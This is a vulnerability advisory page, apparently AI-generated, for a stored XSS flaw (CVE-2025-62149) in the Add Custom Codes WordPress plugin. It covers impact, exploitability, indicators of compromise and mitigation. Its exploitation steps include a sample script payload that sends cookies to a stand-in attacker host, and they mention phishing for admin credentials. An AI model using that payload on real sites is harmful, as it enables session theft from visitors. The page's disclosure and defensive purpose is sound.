CVE-2025-62149
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-62149 is a Stored Cross-Site Scripting (XSS) vulnerability in the Add Custom Codes WordPress plugin by SaifuMak. It affects all versions from n/a through 4.80, allowing authenticated administrators to inject malicious scripts via custom code inputs that are then executed in other users' browsers. The vulnerability was published on December 31, 2025, and assigned by Patchstack. It carries a CVSS v3.1 base score of 5.9 (Medium) (Red Hat CVE, Feedly).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The root cause is insufficient sanitization or escaping of user-supplied input in the plugin's custom code fields before it is stored and rendered in web pages. An authenticated attacker with administrator-level privileges can inject arbitrary JavaScript into these fields; the malicious script is then stored server-side and executed in the browsers of any user who visits the affected page. Exploitation requires high privileges (admin) and user interaction (a victim must load the page containing the injected payload), and the scope is changed, meaning the impact crosses the security boundary of the originating context (Feedly, Patchstack).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of site visitors or other administrators, potentially leading to session token theft, credential harvesting, defacement of web content, or redirection to malicious sites. The changed scope means the injected script can affect users beyond the administrator's own session, including lower-privileged users and unauthenticated visitors. Confidentiality, integrity, and availability are each assessed as Low impact (Feedly).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-62149. The EPSS score is approximately 0.033%, indicating a very low probability of exploitation in the near term. The vulnerability requires high privileges (administrator access) to exploit, which significantly limits the attacker pool. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly).

Exploitation steps

  1. Gain Administrator Access: Obtain WordPress administrator credentials through phishing, credential stuffing, or another means, as exploitation requires high-privilege access.
  2. Navigate to Plugin Settings: Log in to the WordPress admin dashboard and navigate to the Add Custom Codes plugin settings page (typically under a custom menu or Settings).
  3. Inject Malicious Payload: In a custom code input field (e.g., a header/footer code box), insert a stored XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie;</script>.
  4. Save the Configuration: Submit/save the form, causing the malicious script to be stored in the WordPress database.
  5. Trigger Execution: When any user (including lower-privileged users or visitors) loads a page where the custom code is rendered, the injected script executes in their browser, potentially exfiltrating session cookies or performing actions on their behalf (Feedly, Patchstack).

Indicators of compromise

  • Logs: WordPress admin audit logs showing modifications to the Add Custom Codes plugin settings by an administrator account, especially from unusual IP addresses or at unusual times.
  • Database: Unexpected <script> tags or JavaScript event handlers stored in the plugin's database entries (e.g., in the wp_options table under keys associated with the Add Custom Codes plugin).
  • Network: Outbound HTTP requests from victim browsers to unknown external domains shortly after loading pages where custom codes are rendered; look for requests containing cookie or session data in query parameters.
  • File System: No direct file system artifacts expected, as the payload is stored in the database rather than the file system.

Mitigation and workarounds

Users should update the Add Custom Codes plugin to version 4.81 or later, which contains the fix for this vulnerability. As a workaround, administrators should restrict access to the plugin's settings to only fully trusted accounts and audit existing custom code entries for any suspicious script injections. Disabling the plugin entirely until an update can be applied is also a viable temporary measure (Feedly, Wordfence).

Community reactions

Wordfence included CVE-2025-62149 in its weekly WordPress vulnerability report covering December 15, 2025 to January 4, 2026, noting it as part of a broader set of plugin vulnerabilities disclosed during that period (Wordfence). No significant independent researcher commentary or notable social media discussion has been identified for this vulnerability.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management